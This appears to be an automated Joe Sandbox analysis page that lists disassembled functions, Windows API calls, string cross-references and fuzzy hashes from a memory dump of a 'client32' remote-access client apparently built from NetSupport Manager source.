Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Global$File$ReadUnlock$AllocFreeLockSize
String ID:
API String ID: 3489003387-0
Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2

Function 1113F2C0 Relevance: 12.1, APIs: 8, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1113F2CB
GetSubMenu.USER32(?,00000000), ref: 1113F2E8
GetMenuItemID.USER32(?,00000000), ref: 1113F309
GetMenuItemID.USER32(?,00000001), ref: 1113F312
GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
GetMenuItemID.USER32(?,00000001), ref: 1113F33A
DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Delete$Count
String ID:
API String ID: 1985338998-0
Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63

Function 1103D330 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1103D3D1
_memmove.LIBCMT ref: 1103D3DE

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D36F, 1103D39E, 1103D3FD, 1103D433, 1103D47C, 1103D4E9, 1103D542, 1103D5CC, 1103D5FF, 1103D669, 1103D6A0
redirect:, xrefs: 1103D4A8
PF%sinclude:*exclude:, xrefs: 1103D492
IsA(), xrefs: 1103D374, 1103D3A3, 1103D402, 1103D438, 1103D481, 1103D4EE, 1103D547, 1103D5D1, 1103D604, 1103D66E, 1103D6A5

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
API String ID: 118650250-3293259664
Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1

Function 1103D78A Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 270COMMON

Download Yara Rule

APIs

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

_memset.LIBCMT ref: 1103D7F1
_memmove.LIBCMT ref: 1103D7FE

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

Strings

, xrefs: 1103D9F0
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D78F, 1103D7BE, 1103D81D, 1103D84F, 1103D8A1, 1103D92D, 1103D960, 1103D9D1, 1103DA27
include:*exclude:, xrefs: 1103D86A
IsA(), xrefs: 1103D794, 1103D7C3, 1103D822, 1103D854, 1103D8A6, 1103D932, 1103D965, 1103D9D6, 1103DA2C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessage_memmove_memset_strrchrwsprintf
String ID: $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$include:*exclude:
API String ID: 3157302756-4082922542
Opcode ID: 53f59c21df7e99fd8a3beb5585d913ec16f9c72559f272215becf9f7aa0aab04
Instruction ID: b34f6a0116fb1d69a557985a5491b7b4d6030798d4a68a3b28a9f1c5e1cf8312
Opcode Fuzzy Hash: 53f59c21df7e99fd8a3beb5585d913ec16f9c72559f272215becf9f7aa0aab04
Instruction Fuzzy Hash: 40A11535E0051B9FCB06CF94CC94BADF7A2BF85308F048199E8556B744EB31AA09CBD1

Function 11043050 Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110430DC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 110430FC
_strncpy.LIBCMT ref: 1104312A
_strncpy.LIBCMT ref: 11043167
_strncpy.LIBCMT ref: 110431B2
_strncpy.LIBCMT ref: 110431F2
_strncpy.LIBCMT ref: 1104323B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_free$ErrorFreeHeapLast
String ID:
API String ID: 1231584600-0
Opcode ID: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction ID: 3e0d8ed6fad75e9b70bada9a66dea6ffd8c5f444cdc47759be8d9c1188c0d16e
Opcode Fuzzy Hash: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction Fuzzy Hash: FB615DB5E047199FD760CFB9C884BCAFBF9BB55308F0049ADD58997200DAB4A980CF91

Function 1101F140 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F1B1

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
_fputs.LIBCMT ref: 1101F313

Strings

X, xrefs: 1101F1C1
ChatPath, xrefs: 1101F2A1

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91

Function 1100F7E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F7F9

Part of subcall function 1115CC00: std::exception::exception.LIBCMT ref: 1115CC15
Part of subcall function 1115CC00: __CxxThrowException@8.LIBCMT ref: 1115CC2A
Part of subcall function 1115CC00: std::exception::exception.LIBCMT ref: 1115CC3B

std::_Xinvalid_argument.LIBCPMT ref: 1100F81A
std::_Xinvalid_argument.LIBCPMT ref: 1100F835
_memmove.LIBCMT ref: 1100F89D

Strings

invalid string position, xrefs: 1100F7F4
string too long, xrefs: 1100F815, 1100F830

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 280a8978ca9d2d1e0802e856971ab441fb9b2633e223f3e8f14536085e7d6fcf
Instruction ID: 71bcf7d1f46080d68891725eccc127df6be5c001ee658ca25366e07a0233fe7f
Opcode Fuzzy Hash: 280a8978ca9d2d1e0802e856971ab441fb9b2633e223f3e8f14536085e7d6fcf
Instruction Fuzzy Hash: 6F31C832F046259BE714CE6CE880B9AF7E9BF917A4B104A6FE551CB240DB70D94097E2

Function 11059670 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364

ReadFile.KERNEL32(?,?,00002000,?,00000000), ref: 1105971F
GetLastError.KERNEL32 ref: 11059759

Part of subcall function 11059310: _memmove.LIBCMT ref: 1105933B

CloseHandle.KERNEL32(?,?,0000000F), ref: 11059795

Strings

Broken ReadPipe, xrefs: 11059764
close pipe read, xrefs: 110597A1
CltRemCmd, xrefs: 1105968C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseErrorEventFileHandleLastRead_memmove
String ID: Broken ReadPipe$CltRemCmd$close pipe read
API String ID: 1954720312-3712631252
Opcode ID: e271a85b3c6b1a2e47c40ee9b5479b1939671f78d825733734894fecb2808993
Instruction ID: f98590b3321ebf2d7a8685949c825969ab7ce924e7c7c4ef6b6dc5e542918d07
Opcode Fuzzy Hash: e271a85b3c6b1a2e47c40ee9b5479b1939671f78d825733734894fecb2808993
Instruction Fuzzy Hash: 02314175E003199BEBA4CFA98C84A9EB7F5AF49304F0045FAD51DD7242E730AA44DF92

Function 110337F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000158,000000FF,?), ref: 1103384F
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 11033864

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

GetComputerNameA.KERNEL32(?,?), ref: 11033877

Part of subcall function 11033470: SendMessageA.USER32(?,00000146,00000000,00000000), ref: 110334C3
Part of subcall function 11033470: SendMessageA.USER32(?,00000149,00000000,00000000), ref: 110334E9
Part of subcall function 11033470: SendMessageA.USER32(?,00000148,00000000,?), ref: 1103350D
Part of subcall function 11033470: _strncmp.LIBCMT ref: 11033572

SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 110338A0

Strings

pszDomain!=NULL, xrefs: 11033815
CltAutoLogon.cpp, xrefs: 11033810

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Send$ComputerErrorExitLastNameProcess_strncmpwsprintf
String ID: CltAutoLogon.cpp$pszDomain!=NULL
API String ID: 3713365288-3180811078
Opcode ID: 1fac9cd58337a2259b95e65c66f7f6a77f48096be5f2d4f73bc3a539772c1333
Instruction ID: 2270a9e19e6c51411209d0ea500362fc0d7d1d8e806a64c789a1adc7ffb2aa97
Opcode Fuzzy Hash: 1fac9cd58337a2259b95e65c66f7f6a77f48096be5f2d4f73bc3a539772c1333
Instruction Fuzzy Hash: F021F976E146266BD701DB688CC4EDBFBE4AF85735F104365EA24AB2C0EB30A90587D0

Function 110095D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF020: wvsprintfA.USER32(?,11190240,?), ref: 110CF052

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009686
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100969B

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009638, 11009660
<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009695
<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009609
IsA(), xrefs: 1100963D, 11009665

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
